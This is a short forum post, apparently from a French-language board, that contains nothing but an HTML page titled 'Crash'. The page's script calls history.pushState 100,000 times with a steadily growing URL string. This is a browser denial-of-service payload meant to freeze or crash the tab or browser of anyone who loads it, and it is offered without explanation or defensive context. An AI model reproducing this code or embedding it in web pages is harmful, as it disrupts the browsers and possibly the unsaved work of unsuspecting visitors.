Indie_Developer
Membre
Code:
<!DOCTYPE html>
<html>
<body>
<h1>Crash </h1>
<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
</html>